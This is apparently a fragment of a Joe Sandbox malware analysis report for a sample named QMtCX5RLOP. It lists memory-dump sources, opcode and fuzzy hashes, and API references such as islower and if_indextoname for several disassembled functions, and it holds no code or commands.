                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: [
                                                            • API String ID: 0-784033777
                                                            • Opcode ID: a6cd09a9398934ec8b1611cd69753c22b0ea70894e53267b54cee28c63285b6c
                                                            • Instruction ID: 5e2bbaf294f38a11732230141b036c740240cb93ce6e2a6bf943bad0c28ec96d
                                                            • Opcode Fuzzy Hash: a6cd09a9398934ec8b1611cd69753c22b0ea70894e53267b54cee28c63285b6c
                                                            • Instruction Fuzzy Hash: 20B15771908391EBDB359E24C89477BBBD8EB57314F1C092EE8C6C6181EB79C9448772
                                                            Function 010CB1A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 194COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: islower
                                                            • String ID: $
                                                            • API String ID: 3326879001-3993045852
                                                            • Opcode ID: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
                                                            • Instruction ID: cc729acbe1d0935fa00c1aafa905a2367ec43acc4b533136101f4b06c1dd71b7
                                                            • Opcode Fuzzy Hash: ea0f4f2f02c77cff6850d85ad844458c6e7b1f7dbe77ef8bfb68b44ec121d332
                                                            • Instruction Fuzzy Hash: F261E4706083458BC7149F6CC88126FFBE2AFC5B94F548A6DF8D68B391E674D8458F42
                                                            Function 00DF42B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 65COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • if_indextoname.IPHLPAPI(C484002E,C483FFEB), ref: 00DF42FA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1828916428.0000000000D41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D40000, based on PE: true
                                                            • Associated: 00000000.00000002.1828899097.0000000000D40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.00000000012B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1828916428.0000000001419000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829378215.000000000141C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000141E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000159B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000016B8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.0000000001796000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.000000000179E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829393534.00000000017AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829680681.00000000017AD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1829790519.0000000001965000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_d40000_QMtCX5RLOP.jbxd
                                                            Similarity
                                                            • API ID: if_indextoname
                                                            • String ID: %$%lu
                                                            • API String ID: 1170979652-938625555
                                                            • Opcode ID: 7e2c6060f999bc0cad5cdbf035b1ef4ff2687b85ae96af7766fc12ecbacb666f
                                                            • Instruction ID: 74ed8f03694b7b785cf1864f6fdc594b6babb0ca2670aadb15af2f177217f755
                                                            • Opcode Fuzzy Hash: 7e2c6060f999bc0cad5cdbf035b1ef4ff2687b85ae96af7766fc12ecbacb666f
                                                            • Instruction Fuzzy Hash: 65115CB694425427E7101614EC86BFB36D48B5130CF1D8038E7C8D7242E276ED5AD6F2